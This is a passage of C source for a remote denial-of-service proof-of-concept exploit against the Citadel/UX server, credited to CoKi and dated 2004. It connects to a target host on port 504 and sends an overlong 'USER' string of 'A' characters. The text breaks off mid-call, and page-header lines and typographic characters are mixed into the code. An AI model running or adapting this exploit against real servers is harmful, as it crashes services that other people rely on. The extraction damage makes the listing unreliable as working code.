1 /* citadel_dos.c
2 *
3 * Citadel/UX Remote DoS exploit (Proof of Concept)
4 *
5 * Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
6 *
7 * by CoKi <coki@nosystem.com.ar>
8 * No System Group − http://www.nosystem.com.ar
9 */
10
11 #include <stdio.h>
12 #include <stdlib.h>
13 #include <unistd.h>
14 #include <errno.h>
15 #include <string.h>
16 #include <getopt.h>
17 #include <netdb.h>
18 #include <sys/types.h>
19 #include <sys/fcntl.h>
20 #include <netinet/in.h>
21 #include <sys/socket.h>
22
23 #define BUFFERSIZE 96+1
24 #define ERROR −1
25 #define TIMEOUT 3
26 #define PORT 504
27
28 int connect_timeout(int sfd, struct sockaddr *serv_addr,
29 socklen_t addrlen, int timeout);
30 void use(char *program);
31
32 int main(int argc, char *argv[]) {
33 char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
34 int sockfd;
35 struct hostent *he;
36 struct sockaddr_in dest_dir;
37
38 if(argc != 2) use(argv[0]);
39
40 p = buffer;
41
42 printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
43 printf(" by CoKi <coki@nosystem.com.ar>\n\n");
44
45 memset(p, ’A’, 96);
46 p += 92;
47 *p = ’\0’;
48
49 printf(" [+] verifying host:\t");
50 fflush(stdout);
51
52 if((he=gethostbyname(argv[1])) == NULL) {
Page 1/3
CitadelUX Remote Denial of Service Exploit PoC
CoKi
08/02/2004
53 herror("Error");
54 printf("\n");
55 exit(1);
56 }
57
58 printf("OK\n");
59
60 if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
61 perror("Error");
62 printf("\n");
63 exit(1);
64 }
65
66 dest_dir.sin_family = AF_INET;
67 dest_dir.sin_port = htons(PORT);
68 dest_dir.sin_addr = *((struct in_addr *)he−>h_addr);
69 bzero(&(dest_dir.sin_zero), 8);
70
71 printf(" [+] conecting...\t");
72 fflush(stdout);
73
74 if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
75 sizeof(struct sockaddr), TIMEOUT) == ERROR) {
76
77 printf("Closed\n\n");
78 exit(1);
79 }
80
81 printf("OK\n");
82
83 printf(" [+] sending exploit...\t");
84 fflush(stdout);
85
86 recv(sockfd, temp, sizeof(temp), 0);
87 send(sockfd, "USER ", 5, 0);
88 send(sockfd, buffer, strlen(buffer), 0);
89 sen